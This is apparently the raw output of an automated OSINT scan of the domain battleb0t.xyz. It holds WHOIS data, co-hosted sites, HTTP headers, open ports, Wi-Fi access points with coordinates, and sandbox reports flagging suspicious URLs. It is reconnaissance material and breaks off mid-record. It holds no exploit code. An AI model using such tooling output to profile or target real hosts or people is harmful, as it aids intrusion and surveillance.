Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 02:44:09 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | HTTP/3 | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55154D2E3 (Net ID: 00:01:E3:54:D2:E3) | 52.3759, 4.8975 |
| 2023-05-12 03:41:56 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | tjdev.de | mn2.tjdev.de |
| 2023-05-12 02:44:10 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://funny.battleb0t.xyz | funny.battleb0t.xyz |
| 2023-05-12 03:18:50 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://funny.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | #LG@Vo1P*Service& (Net ID: 00:01:36:57:A4:17) | 37.780462,-122.390564 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | GZN00674 (Net ID: 00:00:00:00:00:F0) | 52.3759, 4.8975 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F1:C3:85) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 9 | 0 | 3 | 0 | None | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} | https://battleb0t.xyz/./src/style.css?4 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | AUMWLAN (Net ID: 00:02:2D:0A:E6:C5) | 50.1188, 8.6843 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE271 (Net ID: 00:02:2D:8F:2B:40) | 37.7642, -122.3993 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007ayong.github.io |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000panther.github.io | 185.199.111.153 |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | dontkillmyapp.com | 0.dontkillmyapp.com |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jbnowires (Net ID: 00:06:25:F6:CF:DC) | 39.0469, -77.4903 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 02:55:15 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 165.232.113.85:443 | 165.232.113.85 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.69): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PMV (Net ID: 00:05:5D:FA:C1:BE) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:09 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Cloudflare Turnstile | ayhu.xyz |
| 2023-05-12 03:22:52 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 188.114.96.1:8443 | 188.114.96.1 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.78): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 141205 (Net ID: 00:0B:85:50:7F:90) | 39.0469, -77.4903 |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-to-1.github.io |
| 2023-05-12 02:55:07 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://ojack.xyz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:6852:120:WilError_01"\n "Local\\SM0:740:304:WilStaging_02"\n "SM0:740:120:WilError_01"\n "Local\\SM0:740:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6852:304:WilStaging_02"\n "SM0:6852:304:WilStaging_02"\n "Local\\SM0:6852:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6852:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6852:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6852:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ojack.xyz"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"in.getclicky.com"\n "ojack.xyz"\n "static.getclicky.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"\n "185.199.109.153:443"\n "142.250.72.202:443"\n "142.250.191.42:443"\n "142.250.189.227:443"\n "104.16.160.16:443"\n "198.145.13.13:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "NTMARTA.DLL" at base a32e0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base a5b50000\n "msedge.exe" loaded module "COMBASE.DLL" at base a5580000\n "msedge.exe" loaded module "OLE32.DLL" at base a5eb0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base a27b0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base 8ae60000\n "msedge.exe" loaded module "NTDLL.DLL" at base a7e20000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base a5c60000\n "msedge.exe" loaded module "SHELL32.DLL" at base a61a0000\n "msedge.exe" loaded module "USER32.DLL" at base a7c40000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base a4d80000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base a4d80000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base a5990000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base a4d80000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00006852]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006852]\n "f_00023e" has type "PNG image data 300 x 196 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00003396]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.fingerprint]- [targetUID: 00000000-00006852]\n "f_000243" has type "PNG image data 289 x 180 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "f_00023d" has type "PNG image data 300 x 198 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00003396]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6852_563561959\\Ruleset Data]- [targetUID: 00000000-00006852]\n "443bec75-e48d-4dfb-a27d-6c7bdb483d29.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\443bec75-e48d-4dfb-a27d-6c7bdb483d29.tmp]- [targetUID: 00000000-00006852]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6852_754789510\\product_page.js]- [targetUID: 00000000-00006852]\n "b336ebd0-d4a4-47df-b4d1-6b4d3bb59bf0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b336ebd0-d4a4-47df-b4d1-6b4d3bb59bf0.tmp]- [targetUID: 00000000-00006852]\n "c2875db4-cba6-4d84-a77a-6de6d5492f57.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006852]\n "08f946f8-b564-437d-821b-598e5badcc01.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\08f946f8-b564-437d-821b-598e5badcc01.tmp]- [targetUID: 00000000-00006852]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00006852]\n "7d70116931cea979_0" has type "data"- [targetUID: N/A]\n "2aee7d6bbf2b31a5_0" has type "data"- [targetUID: N/A]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00006852]\n "98e55e92-e324-45be-9e61-0387e96294ef.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"ojack.xyz" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://ojack.xyz/"\n Pattern match: "http://ojack.xyz"\n Heuristic match: "in.getclicky.com"\n Heuristic match: "static.getclicky.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.42\\LICENSE"'}], u'threat_level': 0, u'size': None, u'job_id': u'63f91081ab1fec1267059632', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'suspicious_ide | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-timer: S1683860056.740489,VS0,VE2 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/login | login |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:03:21 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-range.github.io |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.110 | 35.229.48.116 |
| 2023-05-12 02:46:53 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://kekw.battleb0t.xyz/jar', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:348:120:WilError_01"\n "SM0:348:120:WilError_01"\n "SM0:348:304:WilStaging_02"\n "Local\\SM0:348:304:WilStaging_02"\n "SM0:7052:120:WilError_01"\n "SM0:7052:304:WilStaging_02"\n "Local\\SM0:7052:120:WilError_01"\n "Local\\SM0:7052:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7052:120:WilError_01"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-220', u'name': u'Executes batch file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1059', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1059', u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Process "msedge.exe" with commandline "--single-argument http://kekw.battleb0t.xyz/jar" (UID: 00000000-00007052)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"64.226.81.43:49750"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kekw.battleb0t.xyz"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007052]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00007052]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007052]\n "Session_13324411891984663" has type "data"- [targetUID: N/A]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\manifest.fingerprint]- [targetUID: 00000000-00007052]\n "c920e640-3cd4-4291-b5a7-5ed9af660f2d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ae4685c3-b06f-45e7-8054-1aa0597e7deb.tmp]- [targetUID: 00000000-00007052]\n "8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8c133cbc-cb4f-4494-9a53-681a41c38ec8.tmp]- [targetUID: 00000000-00007052]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007052]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007052]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\7052_1944693387\\manifest.json]- [targetUID: 00000000-00007052]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1200c81a-5f8f-40d4-9791-b368d00c99a1.tmp]- [targetUID: 00000000-00007052]\n "Tabs_13324411893998198" has type "data"- [targetUID: N/A]\n "643a517a-ab51-4a47-a7fa-e8480b929b43.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\643a517a-ab51-4a47-a7fa-e8480b929b43.tmp]- [targetUID: 00000000-00007052]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokenAndKey\\LOG]- [targetUID: 00000000-00007052]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "http://kekw.battleb0t.xyz/jar"\n Pattern match: "Math.PI/180"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "http://kekw.battleb0t.xyz"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "kekw.battleb0t.xyz/jar"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\product_page.js]- [targetUID: 00000000-00007052]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\shoppingfre.js]- [targetUID: 00000000-00007052]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00007052]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007052]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7052_16790919\\adblock_snippet.js]- [targetUID: 00000000-00007052]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7052_1268572528\\auto_open_controller.js]- [targetUID: 00000000-00007052]\n "edge_confirmation_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7052_1268572528\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007052]\n "shopping.js" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00007052]\n 